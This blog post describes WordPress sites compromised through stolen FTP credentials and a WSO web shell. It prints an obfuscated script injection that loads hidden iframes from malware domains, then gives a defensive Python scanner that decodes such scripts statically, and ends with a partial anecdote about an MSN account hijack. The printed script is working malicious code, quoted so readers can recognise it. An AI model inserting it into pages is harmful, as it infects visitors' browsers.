WordPress is great, but the more people use it, the more “criminals” out there will target its vulnerabilities.
Alex has a detailed write-up covering his site being hacked, in “My website was hacked – yours could be too! You won’t know until it’s too late.”
From the article (read the whole thing):
Yesterday I found out that my website had been hacked. Not only that, but it had been hacked months ago, and I hadn’t even noticed. How did this happen?
I only found out about it because somebody was kind enough to email me to let me know that they saw this on Google
Even the best of us get hacked when we use any “standardized” platform (Windows, OS X, WordPress, Drupal, etc.).
What is WSO? It’s an environment hackers can upload to your server when they find a vulnerability, and use to access everything on your site. When you’ve been hacked, this is the payload that a hacker wants delivered. It could sit dormant for months before being activated. Ever hear about those “Zombie Computers”? WSO is like a bite from a zombie: it can transform your website into anything they want at any time, and all they have to do is wake it up.
Did Alex make any mistakes? Maybe … he should have been aware of the TimThumb vulnerability, as most WordPress developers were. Is it his fault? Not really.
If you found your server hacked in the past few days (maybe through a browser alert in Chrome) with the following code:
<script>ti=’.c’;ai=’af’;qo=’p’;jn=’htm’;rf=’n’;tf=’doz’;yn=’ifr’;xm=’s’;cl=’o’;jd=’k9′; nn=’tv.’;rl=’85y’;r=’umu’;eh=’m/’;ec=’htt’;sb=’rc’;f=’ame’;l=’://’;b=yn.concat(f); gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute(‘width’,’1′);xp.setAttribute(‘height’,’1′); xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);</script><script>wa=’t’;p=’ht’;f=’k98′;tb=’ame’;bg=’.’;v=’sr’;g=’tp:’;vf=’/z’;bs=’t’;px=’v.h’; br=’yt’;k=’c’;yr=’m’;ds=’m’;ej=’/’;au=’/’;t=’com’;sp=’ifr’;r=’ca’;cp=’y’;wz=’ir’; wf=’u’;b=’5′;se=sp.concat(tb);oz=v.concat(k); db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute(‘width’,’1′);ip.setAttribute(‘height’,’1′); ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>
Then you should know it is likely a breach of your FTP password.
You will find that code inserts iframes that spread the malware, linking to the following sites (do not go there):
- http:|| numudozaf . com
- http:|| zirycatum . com
First, you need to figure out which machine caused the breach. One or more computers with FTP information stored on them were breached. If you give that computer a new FTP account, it will just get hacked again.
Based on some reports online, it is likely that every FTP site you have access to was compromised (if you were the source of the compromise). You should request logs from your web host, to identify which user caused the problem.
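To find every file carrying a script like the one above, the fragments can be reassembled statically, without running the JavaScript. The following is an added example, not code from the original post: the function names and the placeholder domain in the sample are made up here, and it only handles the literal-plus-`.concat()` pattern shown above (including copies whose quotes were turned into curly quotes by blog formatting).

```python
import re
from pathlib import Path

# Straight quotes plus the curly/prime forms blog software substitutes in pasted samples.
Q = "'\"\u2018\u2019\u2032"
LITERAL = re.compile(rf"(?<![\w.])(\w+)\s*=\s*[{Q}]([^{Q}]*)[{Q}]")
CONCAT = re.compile(r"(?<![\w.])(\w+)\s*=\s*(\w+)\.concat\(([\w\s,]*)\)")
SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)

def resolve_strings(js):
    """Rebuild strings assembled from literals and .concat(), without running the JS."""
    values = dict(LITERAL.findall(js))
    for name, base, args in CONCAT.findall(js):
        parts = [base] + [a.strip() for a in args.split(",") if a.strip()]
        if all(p in values for p in parts):
            values[name] = "".join(values[p] for p in parts)
    return values

def defang(url):
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def find_injected_iframes(html):
    """Return defanged URLs of iframes that inline scripts assemble from fragments."""
    hits = []
    for js in SCRIPT.findall(html):
        values = resolve_strings(js).values()
        if "createElement" in js and "iframe" in values:
            hits += [defang(v) for v in values if v.startswith(("http://", "https://"))]
    return hits

def scan_tree(root, suffixes=(".php", ".html", ".htm")):
    """Map each file under root that carries such a script to the URLs it loads."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            urls = find_injected_iframes(path.read_text(errors="replace"))
            if urls:
                report[str(path)] = urls
    return report

# Constructed sample in the same style as the injected code (placeholder domain).
SAMPLE = (
    "<p>Hello</p><script>a='ifr';b='ame';c='s';d='rc';e='htt';f='p://';"
    "g='malware';h='.example';i='.invalid/';j='x.htm';t=a.concat(b);"
    "u=c.concat(d);v=e.concat(f,g,h,i,j);var x=document.createElement(t);"
    "x.setAttribute('width','1');x.setAttribute('height','1');x.frameBorder=0;"
    "x.setAttribute(u,v);document.body.appendChild(x);</script>"
)
```

Run `scan_tree()` against a downloaded copy of the web root; the files it lists, together with their modification times, are what to match against the FTP logs from your host.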
I’m not always the biggest fan of Microsoft, but I have to admit they have a large reach and significant resources.
Recently a friend of mine mentioned his MSN account got hacked, and that it was a vulnerability in “some Microsoft software”.
It’s scary just how much your email account controls nowadays. In my friend’s case, his credit cards were manipulated, his Facebook account stolen, his email was hijacked (duh), and many of his other accounts linked to that email were stolen. Our email account is used to validate bank accounts (occasionally, although many other means of security are used), many of our “social” accounts, medical records, credit cards, and almost everything we do.
Microsoft recently suggested that he install their recent piece of security software to prevent this …